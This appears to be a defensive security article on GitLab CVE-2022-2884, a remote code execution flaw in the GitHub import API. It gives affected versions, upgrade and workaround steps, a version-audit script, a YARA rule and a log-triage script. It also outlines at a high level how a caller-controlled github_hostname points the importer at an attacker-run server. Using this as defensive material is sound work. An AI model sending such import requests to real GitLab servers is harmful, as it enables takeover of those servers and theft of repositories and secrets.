GitLab CVE-2022-2884 is a critical remote code execution vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). Rated 9.9 on the CVSS v3.1 scale, it affects every release from 11.3.4 up to but not including 15.1.5, the 15.2 line before 15.2.3, and 15.3.0 (15.3.1 is the first fixed 15.3 release).
The vulnerability stems from the “Import from GitHub” API endpoint, which can be abused by authenticated low-privileged users to execute arbitrary code on the GitLab server without user interaction.
How the GitHub Import API Enables RCE
The root cause is trust in data the GitHub importer fetches. The import request is an ordinary API call: POST /api/v4/import/github takes a personal_access_token for the source account, a repo_id, a target_namespace and an optional new_name, plus a github_hostname that selects which GitHub API host GitLab talks to (it defaults to github.com and exists to support GitHub Enterprise). Because that hostname is caller-controlled, the "GitHub" the importer talks to can be a server the attacker runs, and the background import job processes whatever that server returns. GitLab's advisory does not spell out the final primitive, only that the import path leads to arbitrary code execution on the GitLab server.
Exploitation Flow:
- An authenticated user (any role; a personal access token with the api scope is enough) calls POST /api/v4/import/github.
- github_hostname in that request points the importer at a host the attacker controls, while repo_id, target_namespace and new_name are filled in so the request looks like a routine import.
- Sidekiq picks up the import job and processes the attacker-controlled responses; no second user has to approve or click anything.
- Result: command execution as the GitLab service user (git on Omnibus installs), which has every repository, the database credentials and Redis within reach.
Nothing in this flow needs a browser. It is plain, token-authenticated API traffic, so it is easy to script and to run at scale against every instance on which an attacker holds an account.
Affected GitLab Versions and Patch Details
Vulnerable Versions:
- GitLab CE/EE 11.3.4 up to and including 15.1.4
- 15.2.0 up to and including 15.2.2
- 15.3.0
Fixed Versions:

| GitLab Version Line | Patched Version |
|---|---|
| 15.1.x | 15.1.5 |
| 15.2.x | 15.2.3 |
| 15.3.x | 15.3.1 |

Lines older than 15.1 received no backported fix; an instance on 14.x or earlier has to move to 15.1.5 or later (in practice, to the newest supported line). For complete details, see GitLab's critical security release post for 15.3.1, 15.2.3 and 15.1.5 (22 August 2022) and the NVD entry for CVE-2022-2884.
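Checking a fleet against the ranges above by hand is error-prone, especially with the gap between 15.1.4 and 15.1.5 and the single vulnerable 15.3.0 release. The following is an added example written for this article (not GitLab code or an official tool) that turns the published ranges into a version check and runs it over a constructed inventory; the hostnames and versions in SAMPLE_INVENTORY are illustrative, and in practice the version string comes from GET /api/v4/version on each instance.

```python
"""Map GitLab version strings to CVE-2022-2884 exposure.

Added example for this article; it is not GitLab code and not an official
tool. The ranges below are the ones GitLab and NVD published for the CVE.
"""
import re

# (first vulnerable, first fixed) per affected line; the fixed bound is exclusive.
AFFECTED_RANGES = (
    ((11, 3, 4), (15, 1, 5)),   # 11.3.4 <= v < 15.1.5
    ((15, 2, 0), (15, 2, 3)),   # 15.2.0 <= v < 15.2.3
    ((15, 3, 0), (15, 3, 1)),   # 15.3.0 <= v < 15.3.1
)


def parse_version(text):
    """Reduce '15.1.4-ee', '15.3.1-ee.0' or 'v15.2.3' to a (major, minor, patch) tuple."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"not a GitLab version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(version):
    """True if the version falls inside any published affected range."""
    v = parse_version(version)
    return any(low <= v < fixed for low, fixed in AFFECTED_RANGES)


def minimum_fix_for(version):
    """First release that closes the bug for this install, or None if unaffected."""
    v = parse_version(version)
    for low, fixed in AFFECTED_RANGES:
        if low <= v < fixed:
            return ".".join(str(n) for n in fixed)
    return None


def audit(inventory):
    """inventory: {hostname: version string as returned by GET /api/v4/version}.
    Returns [(host, version, minimum fix)] for every vulnerable host, in inventory order."""
    return [(host, ver, minimum_fix_for(ver))
            for host, ver in inventory.items() if is_vulnerable(ver)]


# Constructed sample inventory (hostnames and versions are illustrative).
SAMPLE_INVENTORY = {
    "gitlab.corp.example": "15.1.4-ee",
    "gitlab-dev.corp.example": "15.3.1-ee",
    "legacy-git.corp.example": "14.10.2",
    "gitlab-staging.corp.example": "15.2.3",
}

if __name__ == "__main__":
    for host, ver, fix in audit(SAMPLE_INVENTORY):
        print(f"{host}: {ver} is vulnerable to CVE-2022-2884, upgrade to at least {fix}")
```

The check deliberately ignores the -ee / -ce suffix and any build number, since exposure depends only on the major.minor.patch triple; a 14.x instance is reported with 15.1.5 as its minimum fix because no 14.x patch exists.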
Exploit Analysis and Real-World Risk
The vulnerability was reported to GitLab through its HackerOne bug bounty program by the researcher yvvdwf and fixed in the 22 August 2022 critical security release. Since then it has resurfaced in pentesting toolkits and exploit archives.
Real-World Impact:
- Anyone with an account on the instance (contractors, red teams, a phished employee) can turn that account into a shell on the GitLab server.
- Internet-facing instances with open sign-up, or with weak or misconfigured authentication, are effectively exploitable by anyone, because the only precondition is a valid login.
- From the GitLab host an attacker holds every repository plus the CI/CD configuration, so the follow-on is poisoned pipelines, malware pushed through deployments, and stolen CI variables and other secrets.
Mitigation Strategies and Upgrade Path
Mitigation (If Patch Is Not Possible Immediately):
- Disable GitHub as an import source, which is the workaround GitLab itself recommended. In the UI: Admin Area > Settings > General > Visibility and access controls > Import sources, untick GitHub. From the Rails console, remove just that source rather than emptying the list (an empty list also switches off every other importer):

```ruby
# sudo gitlab-rails console
settings = ApplicationSetting.current
settings.update!(import_sources: settings.import_sources - ['github'])
```

- As defence in depth, deny POST /api/v4/import/github on the WAF or reverse proxy in front of GitLab. This only covers the REST route (the web UI import flow uses a different path), so treat it as an extra layer rather than the control that closes the feature.
Upgrade Path:
Upgrade to the first patched release of your line or, better, to the newest patch release on a supported line. For Omnibus installs on Debian/Ubuntu (gitlab-ce for CE, gitlab-ee for EE):

```shell
sudo apt-get update
sudo apt-get install gitlab-ee=15.3.1-ee.0
```

Source installs follow GitLab's "upgrade from source" guide, which also covers dependencies, asset compilation and the Gitaly and Workhorse components. The core steps are below; do not run rake gitlab:setup here, because that is the fresh-install task and it drops the database:

```shell
cd /home/git/gitlab
sudo -u git -H git fetch --all && sudo -u git -H git checkout 15-3-stable   # 15-3-stable-ee for EE
sudo -u git -H bundle exec rake db:migrate RAILS_ENV=production
sudo service gitlab restart
```
Detection Rules and Incident Readiness
YARA Rule (Generic):
A string match cannot separate a malicious import from a legitimate one, since every GitHub import hits the same path, so this rule is a triage aid for captured request bodies or exported logs, not a blocking signature. It fires on requests that set github_hostname to something other than github.com, which also includes legitimate GitHub Enterprise imports; add those hosts to the exclusions before running it at scale.

```yara
rule GitLab_CVE_2022_2884_ImportRequest
{
    meta:
        description = "GitHub import API request with a non-github.com host (triage aid; expect hits from GitHub Enterprise imports)"
    strings:
        $path = "/api/v4/import/github"
        $host = "github_hostname" nocase
        $legit = "github.com" nocase
    condition:
        $path and $host and not $legit
}
```
Log Monitoring (GitLab Logs):
On Omnibus installs the API request is recorded in /var/log/gitlab/gitlab-rails/api_json.log (REST calls; the web UI import flow is logged in production_json.log instead), and errors from the import worker land in /var/log/gitlab/sidekiq/current. Watch for POST /api/v4/import/github from users who have no reason to import, for a github_hostname that is neither github.com nor your GitHub Enterprise host, and for 5xx responses on that path, which indicate an import job that blew up.
Example suspicious log entry (constructed to show the api_json.log shape, in which params is a list of key/value pairs; the host, user and address are illustrative):

```json
{
  "method": "POST", "path": "/api/v4/import/github", "status": 500,
  "params": [{"key": "github_hostname", "value": "https://gh-mirror.example.net"},
             {"key": "repo_id", "value": "12345"}],
  "username": "contractor1", "remote_ip": "10.1.2.3"
}
```
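To turn the three signals above into something that runs over a log file, here is an added example written for this article (not GitLab code and not a GitLab-published detection). It assumes the Omnibus api_json.log shape (one JSON object per line, params as a list of key/value pairs); ALLOWED_HOSTS, BURST_THRESHOLD and the lines in SAMPLE_LOG are assumptions to tune per environment, and the users, hosts and addresses in the sample are constructed.

```python
"""Triage GitHub-import calls in GitLab's api_json.log.

Added example for this article, not GitLab code or a GitLab-published
detection. Assumes the Omnibus api_json.log shape: one JSON object per line,
with "params" as a list of {"key", "value"} pairs. The allowlist, the burst
threshold and the sample lines are assumptions to tune per environment.
"""
import json
from collections import Counter
from urllib.parse import urlparse

IMPORT_PATH = "/api/v4/import/github"
# Hosts a legitimate import should talk to; add your GitHub Enterprise host here.
ALLOWED_HOSTS = {"github.com", "api.github.com"}
BURST_THRESHOLD = 3   # import calls by one user within the scanned window


def params_to_dict(params):
    """api_json.log stores params as [{"key": ..., "value": ...}, ...]."""
    return {p.get("key"): p.get("value") for p in params or []}


def hostname_of(value):
    """github_hostname may arrive with or without a scheme; normalise to a bare host."""
    if not value:
        return None
    parsed = urlparse(value if "://" in value else "https://" + value)
    return (parsed.hostname or "").lower() or None


def scan(lines):
    """Return (username, reason, detail) findings for import calls worth a look."""
    findings = []
    per_user = Counter()
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            continue                      # not a JSON log line; skip rather than crash
        if entry.get("path") != IMPORT_PATH or entry.get("method") != "POST":
            continue
        user = entry.get("username") or str(entry.get("user_id"))
        per_user[user] += 1
        params = params_to_dict(entry.get("params"))
        host = hostname_of(params.get("github_hostname"))
        if host and host not in ALLOWED_HOSTS:
            findings.append((user, "custom_github_hostname", host))
        if int(entry.get("status", 0)) >= 500:
            findings.append((user, "import_request_failed", str(entry.get("status"))))
    for user, count in per_user.items():
        if count >= BURST_THRESHOLD:
            findings.append((user, "import_burst", str(count)))
    return findings


# Constructed sample log lines (users, hosts and addresses are illustrative).
SAMPLE_LOG = [
    '{"time":"2022-08-23T09:00:00.000Z","method":"POST","path":"/api/v4/import/github","status":201,'
    '"params":[{"key":"repo_id","value":"101"}],"username":"alice","remote_ip":"10.1.2.10"}',
    '{"time":"2022-08-23T09:05:00.000Z","method":"GET","path":"/api/v4/projects","status":200,'
    '"params":[],"username":"alice","remote_ip":"10.1.2.10"}',
    '{"time":"2022-08-23T10:15:01.123Z","method":"POST","path":"/api/v4/import/github","status":201,'
    '"params":[{"key":"github_hostname","value":"https://gh-mirror.example.net"},{"key":"repo_id","value":"12345"}],'
    '"username":"contractor1","remote_ip":"10.1.2.3"}',
    '{"time":"2022-08-23T10:15:09.456Z","method":"POST","path":"/api/v4/import/github","status":500,'
    '"params":[{"key":"github_hostname","value":"http://203.0.113.5:8080"},{"key":"repo_id","value":"12345"}],'
    '"username":"contractor1","remote_ip":"10.1.2.3"}',
    '{"time":"2022-08-23T10:15:20.789Z","method":"POST","path":"/api/v4/import/github","status":201,'
    '"params":[{"key":"github_hostname","value":"gh-mirror.example.net"},{"key":"repo_id","value":"12346"}],'
    '"username":"contractor1","remote_ip":"10.1.2.3"}',
    '{"time":"2022-08-23T11:00:00.000Z","method":"POST","path":"/api/v4/import/github","status":201,'
    '"params":[{"key":"github_hostname","value":"https://api.github.com"},{"key":"repo_id","value":"7"}],'
    '"username":"bob","remote_ip":"10.1.2.77"}',
]

if __name__ == "__main__":
    for user, reason, detail in scan(SAMPLE_LOG):
        print(f"{user}: {reason} ({detail})")
```

Run against a real file with scan(open("/var/log/gitlab/gitlab-rails/api_json.log")). A request with no github_hostname is not flagged because the importer then defaults to github.com; the custom-host finding is the one that matters most, since a legitimate import of a public or private github.com repository never needs that parameter at all.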
Suggested Detection Tools:
- GitLab audit events together with the JSON logs above, shipped to your SIEM
- Suricata/Snort signatures on the API path; these are IDS/IPS sensors, not WAFs, and only see the request where TLS is terminated before the sensor
- API gateway or reverse-proxy inspection (AWS API Gateway, Kong, nginx) to log or block the route
Conclusion
The GitLab CVE-2022-2884 vulnerability is a high-impact RCE flaw that continues to pose a threat, especially in organizations that haven’t patched older GitLab CE/EE deployments. Despite its 2022 discovery, many environments still lack proper remediation or monitoring.
Teams should urgently patch, monitor for IOCs, and restrict API access until full mitigation is applied. Given the attack only requires a low-privilege authenticated user, this vulnerability should be treated as an active insider threat vector.